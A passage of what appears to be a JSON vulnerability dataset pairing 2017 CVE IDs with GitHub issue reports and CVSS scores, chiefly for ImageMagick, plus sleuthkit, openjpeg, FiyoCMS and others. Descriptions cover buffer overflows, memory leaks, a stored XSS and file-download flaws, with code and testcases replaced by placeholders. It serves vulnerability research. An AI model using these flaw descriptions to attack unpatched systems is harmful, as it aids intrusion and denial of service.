        "Issue_Url_new": "https://github.com/pbatard/rufus/issues/1009",
        "Repo_new": "pbatard/rufus",
        "Issue_Created_At": "2017-08-28T15:47:42Z",
        "description": "Rufus downloads updates over insecure HTTP. Checklist [x ] I looked at URLTAG to see if my question has already been answered. [x ] I performed a search in the issue tracker for similar issues, using keywords relevant to my problem. [x ] I clicked the Log button in Rufus and copy/pasted the log into the line that says APITAG below. [x ] The log I am copying is the FULL log, starting with the line APITAG I have NOT removed any part of it. Issue description Rufus checks for updates over HTTPS, however the update itself is downloaded over HTTP, which is insecure. See also: FILETAG Log CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-13131",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/676",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/676",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-15T08:32:02Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG list.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13132",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/674",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/674",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-14T16:25:20Z",
        "description": "assertion failure in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG An assertion failure was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13133",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/679",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/679",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-16T16:11:37Z",
        "description": "memory exhaustion in load_tile. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify xcf file , imagemagick will allocate memory to store the data, here is the critical code: (xcf.c , in function load_tile) APITAG The parameter \"data_length\" is passed from function load_level: ERRORTAG The \"offset2\" and \"offset\" can be read from input file (can be controlled). APITAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13134",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/670",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/670",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-12T05:12:16Z",
        "description": "heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify SFW file ,a heap buffer overflow vulnerability was found in function APITAG in coders/sfw.c, Here is the critical code: ERRORTAG In function APITAG ERRORTAG The memory space of the heap buffer \"p\", is p~q (from p NUMBERTAG to p[q p NUMBERTAG but in the for loop of while,the \"p[i]\" will lead to heap buffer overflow. testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13135",
        "Issue_Url_old": "https://github.com/ebel34/bpg-web-encoder/issues/1",
        "Issue_Url_new": "https://github.com/ebel34/bpg-web-encoder/issues/1",
        "Repo_new": "ebel34/bpg-web-encoder",
        "Issue_Created_At": "2017-11-16T00:15:04Z",
        "description": "3 bugs for.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-13140",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/596",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/596",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-21T17:02:55Z",
        "description": "Potential DOS attack with pngs. Hi there I've discovered a potential DOS vulnerability in APITAG when dealing with PNGs. Is there a security reporting email I should contact, or shall I just post it here?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13141",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/600",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/600",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T13:59:51Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13143",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/362",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/362",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-01-26T15:31:47Z",
        "description": "use of uninitialized data in PATHTAG In issue NUMBERTAG an out of bounds read involving the mat image format has been fixed. After the fixing commits the buffer APITAG is large enough to deal with the APITAG file CVETAG that lead to issue NUMBERTAG However, after the fix the coder still accesses uninitialized data which might pose a security issue or at least a bug. The first undefined access happens within APITAG in a call to APITAG . The back part of the buffer APITAG is now large enough but does seemingly not contain any sensible data. I've tested this using the current APITAG master branch git revision APITAG Undefined access is detected by _valgrind_ using this command line: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-13145",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/501",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/501",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-28T06:09:07Z",
        "description": "Failed tests with NUMBERTAG and NUMBERTAG APITAG PATHTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13658",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/598",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/598",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T13:55:02Z",
        "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. APITAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13692",
        "Issue_Url_old": "https://github.com/htacg/tidy-html5/issues/588",
        "Issue_Url_new": "https://github.com/htacg/tidy-html5/issues/588",
        "Repo_new": "htacg/tidy-html5",
        "Issue_Created_At": "2017-08-24T09:57:54Z",
        "description": "[bug] Segmentation Fault. Description This crash occurs at APITAG In function APITAG , the variable c equals to NUMBERTAG in this case). When function APITAG is called, it can cause Segmentation Fault. Version APITAG Address Sanitizer Output ERRORTAG GDB Information APITAG APITAG Contact me if you need Poc file at EMAILTAG or EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-13755",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/913",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/913",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2017-08-25T19:50:41Z",
        "description": "fls segfaults in iso NUMBERTAG proc_dir.. To reproduce: $ unzip FILETAG Archive: FILETAG inflating: segfault.img $ fls segfault.img Segmentation fault This bug was found using american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: ERRORTAG Input:",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-13756",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/914",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/914",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2017-08-25T20:38:17Z",
        "description": "mmls hangs due to infinite looping of APITAG To reproduce: $ base NUMBERTAG d > FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG $ unzip FILETAG Archive: FILETAG inflating: hang.img $ fls hang.img hangs here] This bug was found using [american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: CODETAG Input: See above. I can't attach the zip file, for unknown reasons.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-13760",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/906",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/906",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2017-08-24T21:23:06Z",
        "description": "fls hangs on corrupt exfat image.. To reproduce: $ unzip FILETAG Archive: FILETAG inflating: hang.img $ fls hang.img hangs here] This bug was found using [american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: CODETAG Input: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-13768",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/706",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/706",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-29T10:37:35Z",
        "description": "Null Pointer Dereference in the APITAG function within PATHTAG A Null Pointer De reference vulnerability is occurring due to the vulnerable code in the APITAG function within PATHTAG The vulnerable code is as follows: ERRORTAG It is seen that _p_ is being explicitly checked whether it is NULL and if it is, it breaks out of the for loop. Now the subsequent for loop modifies the value of p but due to the break statement, this doesn't occur. Eventually, _p_ is being used as an argument here in the APITAG function: APITAG Looking at the definition, _p_ is passed into _const Quantum magick_restrict pixel_, which is the NUMBERTAG nd argument. This is being explicitly de referenced here: APITAG There should be a check to verify if a pointer is NULL or not before any operations are performed on it, if it depends on user input: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13769",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/705",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/705",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-29T09:51:25Z",
        "description": "Array Index Out of Bounds and Potential Buffer Overflow due to user controlled value being used as Array Index. An issue affects PATHTAG in the APITAG function, where an externally controllable value is being used as an index in the process of generating a thumbnail image. This can lead to potential Buffer Overflow. The vulnerable code is: ERRORTAG Here the _offset_ variable gets its value from APITAG being run on an input image. This value of _offset_ is not being sanitized before it is being used as an array index in: APITAG It is also being used to generate the _thumbnail_image_ by calling the APITAG function, where the value of _const void blob_ depends on the value of offset. Validation is being performed on whether blob is NULL using: ERRORTAG However, there are no checks on whether it is too large.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13778",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/8",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/8",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-08-29T12:32:46Z",
        "description": "PATHTAG $_POST[site_name] variable exists Storage XSS vulnerability. Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work PATHTAG $_POST[site_name] variable exists Storage XSS vulnerability ERRORTAG '$_POST[site_name]' is not filtered,and Write directly to the database APITAG and then PATHTAG CODETAG It does not do any filtering, directly the \u2019site_name\u2018 output page So when i set the 'site_name' to xss payload,there is a storage xss APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13780",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/8",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/8",
        "Repo_new": "eyesofnetworkcommunity/eonweb",
        "Issue_Created_At": "2017-08-30T15:41:25Z",
        "description": "PATHTAG $_GET FILETAG CODETAG '$_GET[\"file\"]' is not filtered,and exists arbitrary file download vulnerability So when we open this url: [ URLTAG ) it would download the file PATHTAG APITAG and we can get the contents of this file APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14039",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/992",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/992",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-16T14:35:03Z",
        "description": "heap base buffer overflow in opj_t2_encode_packet (t2.c). On master: ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14041",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/997",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/997",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-18T11:28:36Z",
        "description": "stack based buffer overflow write in pgxtoimage (/convert.c). On master, I didn't try on NUMBERTAG ERRORTAG Testcase: URLTAG Can you confirm if it affects NUMBERTAG too?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14060",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/710",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/710",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T07:54:41Z",
        "description": "Null Pointer Dereference vulnerability triggered by malformed image files. A Null Pointer Dereference issues is present in the APITAG function within the PATHTAG file. The vulnerable code is as follows: ERRORTAG Here, the variable _q_ is getting the output of the function APITAG This function, in turn calls: ERRORTAG The APITAG function performs a series of asserts are explicitly returns NULL: ERRORTAG Once this NULL is returned back to the original function via APITAG , _q_ gets the NULL value. It gets used in a function call: APITAG It is finally de referenced in APITAG in the following line: APITAG Modifying the code to: APITAG Would avoid this vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14063",
        "Issue_Url_old": "https://github.com/AsyncHttpClient/async-http-client/issues/1455",
        "Issue_Url_new": "https://github.com/asynchttpclient/async-http-client/issues/1455",
        "Repo_new": "asynchttpclient/async-http-client",
        "Issue_Created_At": "2017-08-28T08:43:49Z",
        "description": "Security: AHC can be tricked into connecting to a different host. Issue is very similar to CVETAG that FILETAG . AHC url parser, APITAG can be tricked with a anchor containing a question mark into connecting to a different host. This issue also affects APITAG (as of NUMBERTAG u NUMBERTAG but not APITAG : CODETAG Credit goes to Nicolas Gr\u00e9goire from FILETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14132",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/147",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/147",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2017-09-01T09:36:06Z",
        "description": "heap based buffer overflow in APITAG A heap overflow is found in jasper, and the tested commit is NUMBERTAG f URLTAG ERRORTAG According to the output by APITAG I try to analyse with gdb. by set breadpoint at jas_image_copy CODETAG as we can see, the APITAG is NUMBERTAG and APITAG is NUMBERTAG too. in APITAG , newcmpts is alloc according the APITAG which is NUMBERTAG finnaly alloced by pass NUMBERTAG to malloc which will return a heap address. in the later access in APITAG APITAG APITAG defined in PATHTAG CODETAG poc file: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14136",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9443",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9443",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-08-23T08:45:32Z",
        "description": "out of bound write cause Segmentfault. APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG the latest commit: b NUMBERTAG c NUMBERTAG e NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description An invalid writing occurs in function APITAG It is not the same with the previous one. ( URLTAG the crash details as follows: ERRORTAG Steps to reproduce just call the cv::imread to read the specified testcase. Please refer to the following url for the testcases: URLTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14137",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/641",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/641",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-02T05:01:54Z",
        "description": "memory exhausted in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG Here is the critical code ERRORTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14138",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/639",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/639",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-01T14:48:29Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14139",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/578",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/578",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-17T04:58:46Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick convert $FILE out.msl APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe NUMBERTAG d0b NUMBERTAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5eba in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5f5f in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7a9ecb2 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG df in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG ada9 in APITAG APITAG NUMBERTAG f1fe7a5a NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG f in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG 